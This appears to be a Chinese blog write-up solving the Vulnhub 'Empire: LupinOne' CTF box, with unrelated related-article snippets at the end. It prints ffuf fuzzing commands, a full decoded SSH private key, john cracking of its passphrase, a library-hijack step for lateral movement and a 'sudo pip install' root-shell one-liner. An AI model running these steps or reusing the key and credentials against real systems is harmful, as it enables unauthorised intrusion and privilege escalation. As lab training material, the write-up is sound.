Vulnhub打靶-Empire-LupinOne

基本信息

靶机下载:https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip

攻击机器:192.168.20.128(Windows操作系统)& 192.168.20.138(kali)

提示信息:

  1. 这个盒子被创建为中等大小,但如果你迷路了可能会很困难。
  2. CTF 就像盒子。 你必须尽可能多地列举。

靶机:192.168.20.0/24

目标:获取2个flag+root权限

具体流程

信息收集

老样子首先使用arp-scan -l对主机进行探活,发现主机IP为192.168.20.146

image-20241021170605800

之后对开放的端口进行扫描,执行nmap -O -sV -p- -A 192.168.20.146,结果如下所示

image-20241021171101363

开放了80端口和22端口,我们首先试试80端口能否获取到有价值的信息

image-20241021171234341

先使用dirsearch扫描网站目录,并没有什么有价值的信息,只有一个robots.txt,我们尝试去访问一下

image-20241021172254741

我们查看源码,看到了下面这句话

<!-- Your can do it, keep trying. -->

说明我们的思路是对的,这个404并不是真的访问不到,而是他网页故意设计成了404的样式,同时我们要知道在linux中,~ 指代用户主目录,我们可以尝试找到与此相似的路径,使用ffuf工具对其路径进行测试,我们运行以下语句,然后慢慢等就行了

ffuf -w "C:\Users\Administrator\Desktop\目录字典\directory-list-2.3-small.txt" -u http://192.168.20.146/~FUZZ/ -mc 200 -c -v

image-20241021204448651

漏洞初探

我们可以发现存在一个隐藏路径,我们直接访问这个路径,看看这个路径下面是什么东西

image-20241021204701232

这里告诉我们了两个信息:

  1. 还存在后门文件存放着ssh的私钥
  2. 用户名为icex64

所以我们还需要去爆破后门文件,我们仍然使用ffuf进行爆破,爆破语句如下所示

ffuf -w "C:\Users\Administrator\Desktop\目录字典\directory-list-2.3-medium.txt"
 -u http://192.168.20.146/~secret/.FUZZ/ -e .txt .pub .html .bak -mc 200 -c -v

在这里插入图片描述

我们这里直接访问即可

image-20241021211357182

我们将这一串拿去解密即可,这里使用的是base58加密方式,我们拿base58进行解密,解密结果如下所示

-----BEGIN OPENSSH PRIVATE KEY-----
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
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----

这就是登录系统的私钥,我们想办法去利用一下这个私钥去登录系统,我们可以利用kali自带的ssh2john进行密码的暴力破解,同时,网页提示了我们使用fasttrack密码本,所以我们构造的破解语句如下

ssh2john pass_rsa > password.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt password.txt
john --show password.txt

image-20241021213150628

所以用户的账号密码分别为icex64:P@55w0rd!

登录系统

我们尝试使用账号密码登录系统

image-20241022143827709

zheli就会出现其第一个坑,就是我们得出来的密码并不是系统登录的密码,而是这个私钥的密码,可以理解为隐藏在这个私钥里面的密码,这个密码和登录系统的密码并不是同一个东西,所以会导致我们用xshell连接不上,只能使用私钥进行登录,但是在我的尝试过程中,又会一直出现登不上的过程,我都几乎崩溃快要放弃了,如下图情况所示

image-20241022160827427

后来在一个国外的博客上发现了问题,其实就是Windows上和linux上换行符不一致的原因,导致我们的linux系统不能正确识别这个文件,解决办法如下:

dos2unix key
vim --clean key 
按esc键后输入wq退出即可
chmod 600 key
ssh icex64@192.168.20.146 -i key

image-20241022161205716

我们可以发现成功登录,同时获得第一个flag:user.txt

image-20241022161329900

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

权限水平移动

我们首先执行sudo -l查看是否可以进行sudo提权

image-20241022161835725

我们发现这里有一个py脚本,但是是arsene用户的,我们先看一下这个文件执行了什么东西

import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")

我们查看一下这个文件的权限,如下所示

image-20241022163520866

只有所有者arsene具有写入权限,其余的用户只有可读权限,如果无法写入反弹shell语句的话,我们很难获得arsene用户的权限,这时候我们可以发现其import webbrowser,我们试着去找一找webbrowser文件在哪

find / -name "*webbrowser*" 2>/dev/null

image-20241022164355583

我们试着看有没有写入权限

image-20241022164624861

所有的用户都具有读写执行权限,所以我们尝试在这个文件做手脚进行反弹shell

image-20241022164759993

我们发现这里import os,我们可以利用os获得运行权限,如下所示

d6999bb21c2e06f32935dc37909a0bf8

我们直接运行heist.py文件,如下所示

image-20241022165418164

权限提升

成功获得权限,我们再执行一下sudo -l,发现在这个用户下存在root用户的sudo权限

image-20241022165522915

我们可以利用pip进行sudo提权,直接逐步输入以下shell去获取权限

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

image-20241022170243947

成功获得root权限,并且找到第二个flag

image-20241022170342727

3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}

本题到此结束

总结

  1. ssh私钥的利用
  2. 使用john破解密码
  3. 利用os进行权限横向移动

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/896990.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

FineReport 填报简介vs控件vs页面设置

填报简介 填报功能可以将页面数据写入到数据库&#xff0c;包括数据的增加、删除和修改操作。同时也支持对填写数据的自定义校验&#xff0c;Excel 导入数据&#xff0c;根据填写值智能联动等功能。 填报控件 设计填报报表时&#xff0c;如果需要修改和新增数据&#xff0c;则…

vue3使用element-plus手动更改url后is-active和菜单的focus颜色不同步问题

在实习&#xff0c;给了个需求做个新的ui界面&#xff0c;遇到了一个非常烦人的问题 如下&#xff0c;手动修改url时&#xff0c;is-active和focus颜色不同步 虽然可以直接让el-menu-item:focus为白色能解决这个问题&#xff0c;但是我就是想要有颜色哈哈哈&#xff0c;有些执…

【JAVA面试题】什么是Springboot的自动配置以及注意事项

文章目录 强烈推荐核心概念&#xff1a;自动配置的关键特点&#xff1a;示例&#xff1a; 需要注意的点1.默认配置可能不适合所有场景2.Bean 冲突与覆盖3.应用启动慢的问题4.过度依赖自动配置5.安全性问题6.依赖冲突与版本兼容7.过多不必要的自动配置8.调试困难 专栏集锦 强烈推…

python实战项目43:采集汽车之家数据

python采集汽车之家数据 一、寻找数据接口二、发送请求获取响应三、解析数据四、完整代码一、寻找数据接口 如下图所示,在汽车之家首页点击报价图标: 在下图中选择价位,例如选择15-20万: 打开浏览器开发者工具,刷新页面,找到数据接口。接下来,通过翻页寻找接口url的变…

如果你不幸成为家里第一个GIS专业的学生

家里无法给我很多建设性意见&#xff0c;大学四年到工作都是自己一个人跌跌撞撞走过来的&#xff0c;期间因为信息差走了不少弯路。对于GIS专业而言&#xff0c;没有家里人的指路&#xff0c;信息差就成了同学之间拉开差距的重要因素。现在我们要做的就是打破专业信息差&#x…

Vue+ECharts+iView实现大数据可视化大屏模板

Vue数据可视化 三个大屏模板 样式还是比较全的 包括世界地图、中国地图、canvas转盘等 项目演示&#xff1a; 视频&#xff1a; vue大数据可视化大屏模板

uiautomatorviewer安卓9以上正常使用及问题处理

一、安卓9以上使用uiautomatorviewer问题现象 打开Unexpected error while obtaining UI hierarchy 问题详情 Unexpected error while obtaining UI hierarchy java.lang.reflect.InvocationTargetException 二、问题处理 需要的是替换对应D:\software\android-sdk-windows…

这种V带的无极变速能用在新能源汽车上吧?

CVT的无极变速器的结构能用在电动汽车上吗&#xff1f;

Python 将网页保存为图片(Chrome内核)

一、背景介绍 之前写过一篇将网页保存为图片的文章 C# 将网页保存为图片&#xff08;利用WebBrowser&#xff09;_c# webbrowser 把网页内容转换成图片-CSDN博客​​​​​​ 这里有个弊端&#xff0c;C# WebBrowser使用的是IE内核&#xff0c;目前很多网站都不支持IE了&…

深度学习(二)框架与工具:开启智能未来之门(2/10)

一、深度学习框架&#xff1a;引领智能变革的利器 深度学习框架在人工智能领域中扮演着至关重要的角色&#xff0c;堪称引领智能变革的利器。随着人工智能技术的飞速发展&#xff0c;深度学习框架不断崛起并迅速壮大。 主流的深度学习框架如 TensorFlow、PyTorch、Keras 等&a…

社招高频面试题

1.单例模式 面试突击50&#xff1a;单例模式有几种写法&#xff1f; 2.Mybatis缓存机制 MyBatis的一、二级缓存查询关系 一级缓存是SqlSession级别&#xff0c;不能跨SqlSession共享&#xff0c;默认开启。 二级缓存是基于mapper namespace级别的&#xff0c;可以跨SqlSessi…

第J6周:ResNeXt-50实战解析(pytorch版)

>- **&#x1f368; 本文为[&#x1f517;365天深度学习训练营]中的学习记录博客** >- **&#x1f356; 原作者&#xff1a;[K同学啊]** 任务&#xff1a; ●阅读ResNeXt论文&#xff0c;了解作者的构建思路 ●对比我们之前介绍的ResNet50V2、DenseNet算法 ●使用ResNeX…

基于Java+SpringBoot+Vue的古典舞在线交流平台的设计与实现

基于JavaSpringBootVue的古典舞在线交流平台的设计与实现 前言 ✌全网粉丝20W,csdn特邀作者、博客专家、CSDN[新星计划]导师、java领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ &#x1f345;文末附源码下载链接&a…

科研类型PPT的制作技巧

目录 科研类型PPT的制作技巧 荣誉: 首页:ppt开头结尾 小标题 重点标记:加粗红色下划线 使用三线表 图片,文本排版 一、明确目的与受众分析 二、基础设计原则 三、内容组织与呈现 四、绘图与模型制作 五、其他注意事项 科研类型PPT的制作技巧 荣誉: 首页:ppt开…

spark读取parquet文件

源码 parquet文件读取的入口是FileSourceScanExec&#xff0c;用parquet文件生成对应的RDD 非bucket文件所以走createNonBucketedReadRDD方法。 createNonBucketedReadRDD 过程&#xff1a; 确定文件分割参数 openCostInBytes4M 相关参数spark.sql.files.openCostInBytes4M…

Vue 上传图片前 裁剪图片

一. 使用的技术 vue-cropper 文档&#xff1a;vue-cropper | A simple picture clipping plugin for vue 二. 安装 npm install vue-cropper 或 yarn add vue-cropper 三. 引入 在使用页面中引用 import { VueCropper } from vue-cropper; 四. 使用 配置项&#xff1…

运动爱好者不可错过的双十一特惠,2024年度最火运动装备大推荐

随着健康意识的日益增强&#xff0c;越来越多的人加入到了运动的行列中。无论是追求速度与激情的跑步爱好者&#xff0c;还是享受汗水与肌肉碰撞的健身房常客&#xff0c;亦或是喜欢在自然中寻找乐趣的户外探险家&#xff0c;一款合适的运动装备总是能让人在运动过程中事半功倍…

【MySQL】索引和事务

目录 &#x1f334;索引 &#x1f6a9;概念 &#x1f6a9;索引的作用 &#x1f6a9;索引的使用场景 &#x1f6a9;索引的使用 &#x1f3c0;查看索引 &#x1f3c0;创建索引 &#x1f3c0;删除索引 &#x1f384;索引的底层数据结构 &#x1f6a9;引入B树(B-树) &am…

【含开题报告+文档+PPT+源码】基于SpringBoot和Vue的编程学习系统

开题报告 随着信息技术的迅猛发展和数字化转型的深入推进&#xff0c;编程技能已经成为现代社会中不可或缺的一项基本能力。无论是软件开发、数据分析还是人工智能等领域&#xff0c;编程都扮演着至关重要的角色。因此&#xff0c;培养和提高编程技能对于个人职业发展和社会创…

Python Numpy 实现神经网络自动训练:反向传播与激活函数的应用详解

Python Numpy 实现神经网络自动训练&#xff1a;反向传播与激活函数的应用详解 这篇文章介绍了如何使用 Python 的 Numpy 库来实现神经网络的自动训练&#xff0c;重点展示了反向传播算法和激活函数的应用。反向传播是神经网络训练的核心&#xff0c;能够通过计算梯度来优化模…